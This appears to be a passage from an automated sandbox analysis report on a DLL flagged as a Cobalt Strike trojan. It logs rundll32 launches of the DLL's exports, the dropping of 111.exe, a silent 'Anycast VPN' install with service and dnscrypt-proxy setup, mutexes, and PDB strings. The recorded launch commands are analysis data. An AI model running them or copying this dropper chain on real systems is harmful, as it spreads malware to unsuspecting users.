        Source: C:\Users\Public\111.exeCode function: 6_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004034C5
        Source: C:\Users\Public\111.exeCode function: 6_2_00404858 GetDlgItem,SetWindowTextW,SHAutoComplete,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceExW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,6_2_00404858
        Source: C:\Users\Public\111.exeCode function: 6_2_004021A2 CoCreateInstance,6_2_004021A2
        Source: C:\Program Files (x86)\Anycast\anycast-service.exeCode function: 34_2_00007FF8B8013240 OpenSCManagerW,GetLastError,RegOpenKeyExA,RegCloseKey,OpenServiceA,QueryServiceStatus,StartServiceW,GetLastError,CloseServiceHandle,GetLastError,CloseServiceHandle,SetLastError,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetProcessHeap,HeapAlloc,GetLastError,SetNamedPipeHandleState,GetLastError,WriteFile,GetLastError,ReadFile,GetLastError,SetLastError,SetLastError,SetLastError,SetLastError,CreateFileA,CreateEventW,GetLastError,DeviceIoControl,GetLastError,CloseHandle,SetLastError,GetLastError,CloseHandle,SetLastError,GetLastError,DeviceIoControl,GetLastError,SetLastError,GetLastError,SetLastError,SetLastError,GetLastError,DeviceIoControl,GetLastError,SetLastError,GetLastError,SetLastError,SetLastError,GetLastError,GetProcessHeap,HeapFree,SetLastError,34_2_00007FF8B8013240
        Source: C:\Users\Public\111.exeFile created: C:\Program Files (x86)\AnycastJump to behavior
        Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\A[2].exeJump to behavior
        Source: C:\Program Files (x86)\Anycast\Anycast.exeMutant created: \Sessions\1\BaseNamedObjects\AnycastVPN_SingleInstanceMutex
        Source: C:\Program Files (x86)\Anycast\Anycast.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4256:120:WilError_03
        Source: C:\Program Files (x86)\Anycast\Anycast.exeMutant created: \Sessions\1\BaseNamedObjects\AnycastVPN_QuitInstanceMutex
        Source: C:\Users\Public\111.exeFile created: C:\Users\user\AppData\Local\Temp\nsn16C5.tmpJump to behavior
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\Public\111.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_api_hash
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllReversingLabs: Detection: 33%
        Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll"
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_api_hash
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\Public\111.exe C:\Users\Public\111.exe
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_execute_process
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_get_path
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_api_hash
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_execute_process
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_get_path
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_string
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_int
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_function
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_bool
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8context_get_current_context
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_to_utf16
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_clear
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_to_utf8
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_set
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_cmp
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_clear
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_userfree_utf16_free
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_value
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_size
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_key
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_free
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\Public\111.exe C:\Users\Public\111.exe
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_append
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_alloc
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_map_value
        Source: C:\Users\Public\111.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe stop
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe uninstall
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe install
        Source: unknownProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe C:\Program Files (x86)\Anycast\anycast-service.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe dnscrypt\dnscrypt-proxy.exe -service install
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe dnscrypt\dnscrypt-proxy.exe -service start
        Source: unknownProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe "C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe" -config dnscrypt-proxy.toml
        Source: C:\Users\Public\111.exeProcess created: C:\Program Files (x86)\Anycast\Anycast.exe C:\Program Files (x86)\Anycast\Anycast.exe
        Source: C:\Users\Public\111.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1Jump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_api_hashJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_execute_processJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll,cef_get_pathJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_api_hashJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_execute_processJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_get_pathJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_stringJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_intJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_functionJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8value_create_boolJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_v8context_get_current_contextJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_to_utf16Jump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf8_clearJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_to_utf8Jump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_setJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_cmpJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_utf16_clearJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_userfree_utf16_freeJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_valueJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_sizeJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_keyJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_freeJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_appendJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_multimap_allocJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",cef_string_map_valueJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\loaddll64.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll",#1Jump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\Public\111.exe C:\Users\Public\111.exeJump to behavior
        Source: C:\Users\Public\111.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd" Jump to behavior
        Source: C:\Users\Public\111.exeProcess created: C:\Program Files (x86)\Anycast\Anycast.exe C:\Program Files (x86)\Anycast\Anycast.exeJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Users\Public\111.exe C:\Users\Public\111.exeJump to behavior
        Source: C:\Users\Public\111.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Program Files (x86)\Anycast\install.cmd"
        Source: C:\Users\Public\111.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe stop
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe uninstall
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\anycast-service.exe anycast-service.exe install
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe dnscrypt\dnscrypt-proxy.exe -service install
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Anycast\dnscrypt\dnscrypt-proxy.exe dnscrypt\dnscrypt-proxy.exe -service start
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\Public\111.exeFile written: C:\Users\user\AppData\Local\Temp\nsi16F5.tmp\ioSpecial.iniJump to behavior
        Source: C:\Users\Public\111.exeAutomated click: Next >
        Source: C:\Users\Public\111.exeAutomated click: I Agree
        Source: C:\Users\Public\111.exeAutomated click: Install
        Source: C:\Users\Public\111.exeAutomated click: Next >
        Source: C:\Users\Public\111.exeAutomated click: I Agree
        Source: C:\Users\Public\111.exeAutomated click: Install
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\111.exeWindow detected: < &BackI &AgreeCancelNullsoft Install System v3.06.1 Nullsoft Install System v3.06.1License AgreementPlease review the license terms before installing Anycast VPN 1.0.24.Press Page Down to see the rest of the agreement.This software is provided as is and any expressed or implied warranties including but not limited to the implied warranties of merchantability and fitness for a particular purpose are disclaimed. In no event shall Anycast LLC. be liable for any direct indirect incidental special exemplary or consequential damages (including but not limited to procurement of substitute goods or services; loss of use data or profits; or business interruption) however caused and on any theory of liability whether in contract strict liability or tort (including negligence or otherwise) arising in any way out of the use of this software even if advised of the possibility of such damage.If you accept the terms of the agreement click I Agree to continue. You must accept the agreement to install Anycast VPN 1.0.24.
        Source: C:\Program Files (x86)\Anycast\Anycast.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: Image base 0x180000000 > 0x60000000
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
        Source: SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\Users\nmap\Source\Repos\npcap\packetWin7\vs14\x64\Release\Packet.pdb source: anycast-service.exe, 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, anycast-service.exe, 00000024.00000002.2149901394.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, anycast-service.exe, 00000025.00000002.2168078733.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, anycast-service.exe, 00000026.00000002.2305587215.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmp, Packet.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: System.Configuration.ConfigurationManager.dll.6.dr
        Source: Binary string: C:\Users\admin\source\repos\3_1\libcef\x64\Release\libcef.pdb source: loaddll64.exe, 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.4452591144.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.4452955628.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000009.00000002.4452631373.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll
        Source: Binary string: Hardcodet.NotifyIcon.Wpf.pdbSHA256 source: Anycast.exe, 0000002B.00000002.4466233439.0000000006FD2000.00000002.00000001.01000000.00000021.sdmp
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: Anycast.exe, 0000002B.00000002.4473917532.000000000CD02000.00000002.00000001.01000000.00000027.sdmp, Newtonsoft.Json.dll.6.dr
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder\obj\Release\net40\QRCoder.pdb source: QRCoder.dll.6.dr
        Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdbSHA256> source: Anycast.exe, 0000002B.00000002.4468837667.0000000007232000.00000002.00000001.01000000.0000001E.sdmp
        Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdbSHA256h source: System.Configuration.ConfigurationManager.dll.6.dr
        Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4473917532.000000000CD02000.00000002.00000001.01000000.00000027.sdmp, Newtonsoft.Json.dll.6.dr
        Source: Binary string: D:\nt-driver-builder\wintun-0.14\Release\arm64\driver\wintun.pdbGCTL source: wintun.dll.6.dr
        Source: Binary string: C:\Projects\Anycast\Anycast.Windows\Anycast\obj\Release\Anycast.pdb source: Anycast.exe, 0000002B.00000000.2248836110.0000000000F32000.00000002.00000001.01000000.00000012.sdmp, Anycast.exe.6.dr
        Source: Binary string: C:\Users\Jason A. Donenfeld\Projects\wintun\Release\amd64\wintun.pdb source: wintun.dll.6.dr
        Source: Binary string: d:\agent\_work\8\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: anycast-service.exe, 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, anycast-service.exe, 00000024.00000002.2150000169.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, anycast-service.exe, 00000025.00000002.2168150348.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, anycast-service.exe, 00000026.00000002.2305751193.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmp, vcruntime140.dll.6.dr
        Source: Binary string: Sentry.pdb source: Anycast.exe, Anycast.exe, 0000002B.00000002.4458091074.0000000005AE2000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: D:\a\QRCoder\QRCoder\QRCoder.Xaml\obj\Release\net40\QRCoder.Xaml.pdb source: QRCoder.Xaml.dll.6.dr
